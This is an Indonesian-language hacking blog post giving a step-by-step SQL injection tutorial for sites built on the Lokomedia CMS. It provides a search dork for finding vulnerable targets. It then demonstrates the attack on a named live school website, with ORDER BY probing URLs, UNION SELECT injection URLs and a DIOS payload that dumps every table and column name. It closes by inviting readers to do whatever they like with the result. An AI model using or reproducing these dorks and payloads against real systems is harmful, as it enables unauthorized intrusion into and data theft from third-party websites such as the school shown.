Hello All >_<
Kali ini gua mau ngasih kalian cara atau tutorial sql lokomedia, teknik ini sebenernya sama aja dengan sql biasa, cuma ga pake parameter.
Yang kalian butuhkan?
- HP / PC
- Dork
- DIOS (Buat ngedump)
Proof of Concept
- Dorking dulu menggunakan dork ini
* inurl:/hal-visi-misi.html site:.id (kembangin ya pake otak lu yg segede 2 kepalan tangan)
- Gua pake live target aja ya. http://smalsa.sch.id/hal-visi-misi.html
 |
| Sebelum dikasih ' |
- Tambahkan ' di (hal-visi-misi'.html) nanti akan jadi seperti dibawah, dan itu tandanya vuln.
 |
| Sesudah dikasih ' |
- Lalu kita coba +--+ dan ternyata webnya bener lagi, seperti semula.
- Disini langsung cari column yg error seperti ini.
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+1+--+.html -> Normal
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+2+--+.html -> Normal
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+3+--+.html -> Normal
Skip..
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+12+--+.html -> Normal
http://smalsa.sch.id/hal-visi-misi'ORDER+BY+13+--+.html -> Error
- Berarti columnya sampe 12 dan lalu kita tulis. union+select (lihat bawah)
http://smalsa.sch.id/hal-visi-misi'union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+.html
- Ga muncul angka togelnya? Tambahin +and+0+
http://smalsa.sch.id/hal-visi-misi'+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+.html
 |
| Muncul angka togelnya. |
- Pilih tuh angka errornya, ganti dengan dios
(SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(information_schema.columns)WHERE(@x)IN(@x:=CONCAT(0x20,@x,table_name,0x203a3a20,column_name,0x3c62723e))))x)
- Jadi seperti ini.
 |
| Done :) |
- Udah deh, habis itu terserah mau kalian apain.
Makasih udah baca blog gua yang gajelas ini.
Note : Gua bukan mastah yang tahu segalanya, tapi gua orang yang ingin membagikan ilmu semampu gua bisa.
./MiSetya - Light Cyber Indonesia
0 Comments